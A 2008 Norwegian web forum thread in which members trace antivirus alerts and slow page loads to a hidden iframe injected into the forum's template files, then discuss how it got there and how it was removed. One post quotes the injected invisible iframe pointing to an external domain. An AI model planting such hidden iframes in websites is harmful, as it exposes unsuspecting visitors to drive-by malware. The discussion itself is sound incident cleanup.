Virus på forumet?

En tråd i 'Ris og ros til WF' startet av Magnus Tangen, 14 Aug 2008.

  1. Knut

    Knut Medlem

    Innlegg:
    747
    Og når jeg gikk til den url så kom dette,
     

    Vedlagte filer:

    • eset.jpg
      eset.jpg
      Filstørrelse:
      33 KB
      Visninger:
      30
  2. Bjørn

    Bjørn Domenespekulant

    Innlegg:
    1.636
    Jeg har også hatt samme problemet når jeg har prøvd å logge meg inn på forum-delen de siste gangene. PCen blir bare stående å jobbe i evigheter, uten å komme inn. I dag klarte jeg å komme inn på forumet, så ser vel ut til at problemet er fikset :)
     
  3. gano

    gano Medlem

    Innlegg:
    110
    Det ligger en skjult iframe i toppen av siden. Skru av CSS, så ser du den. Oppdaget akkurat at det samme hadde skjedd på klikkbart.no. Noen har skrevet til en fil, der skriverrettighetene er satt til 644. Jeg lastet bare opp igjen den aktuelle filen, fjernet noen korrupte temporære filer, så var alt tilbake igjen. Er ingen ekspert, så fatter ikke helt selv hvordan jeg skal sikre meg mot flere angrep.
     
  4. gano

    gano Medlem

    Innlegg:
    110
    Her er iframen:


    <iframe src=http://gcounter.cn style=display:none></iframe>
     
    Kenneth Dreyer liker dette.
  5. TorsteinO

    TorsteinO Art Director & grunder

    Innlegg:
    4.642
    oh, den der er sleip, gå inn på 404 Not Found så ser det ut som en side google eier, men en whois sier noe helt annet...
     
  6. Mr Vest

    Mr Vest Sjefen over alle sjefer!

    Innlegg:
    2.079
    Er det dette som er årsaken til at forumet laster så utrooolig treigt om dagene? Her hos meg tar det normalt nå for tiden opptil 20 sekunder før en tråd er ferdig lastet ned....
     
  7. webpiken

    webpiken Medlem

    Innlegg:
    387
    Det er jo ikke umulig det nei. Vi får håpe iframen snart fjernes?

    Noe annet:
    Hos meg har det alltid lastet tregt hvis jeg går inn på den _første_ siden i en tråd. Ellers er det supert.

    Årsaken hos meg er det «Sponsede annonser»-feltet. Det kan ta mange sekunder før det laster. Men det er det nok OpenX som er årsaken til, det er (dessverre!) kjent for å være tregt.

    Er det slik hos dere andre også?
     
  8. webpiken

    webpiken Medlem

    Innlegg:
    387
    Har du sjekket i databasen?

    Jeg vet ikke hva vBulletin gjør, men mange applikasjoner lagrer jo kode i databasen, og kanskje de rett og slett har fått skrevet den inn der?
     
  9. Yngve Larsen

    Yngve Larsen E-commerce ekspert

    Innlegg:
    635
    vil tro det ligger i templaten i databasen.
     
  10. TorsteinO

    TorsteinO Art Director & grunder

    Innlegg:
    4.642
    2.6 skal visstnok ha kutta ganske bra ned, ble sluppet for bare noen dager siden
     
  11. clinton4

    clinton4 Medlem

    Innlegg:
    1.257
    Når eller hvis jeg får svar fra wixawin, så finner vi jo ut hvilken av deres partner som tjener på disse annonsene.
     
  12. Kenneth Dreyer

    Kenneth Dreyer Well-Known Member

    Innlegg:
    3.820
    Da skal det vaere fikset!
     
  13. TorsteinO

    TorsteinO Art Director & grunder

    Innlegg:
    4.642
    ah, bra, hvor var det egentlig? i databasen eller en fil?
     
  14. Kenneth Dreyer

    Kenneth Dreyer Well-Known Member

    Innlegg:
    3.820
    Den var lagt inn i over 20 filer, ingen av dem er skrivbare! Hvordan dem har fått til det vet jeg ikke.. finner ikke noe informasjon om dem på nettet heller! Har kontakt DS for å høre om det kan være serveren som er hacket. Virker som om dem hadde scannet etter alle filer som hadde <body> tegnet i seg og lagt til en linje like etter. Jeg fant nemlig den iframe saken deres på noen template filer som ikke engang er tilgjengelig fra nett..
     
  15. TorsteinO

    TorsteinO Art Director & grunder

    Innlegg:
    4.642
    Hm, har sjekka i et forum jeg har hosta hos domeneshop, ingenting der, men kan jo bare hende at det er på en annen server.
     

Del denne siden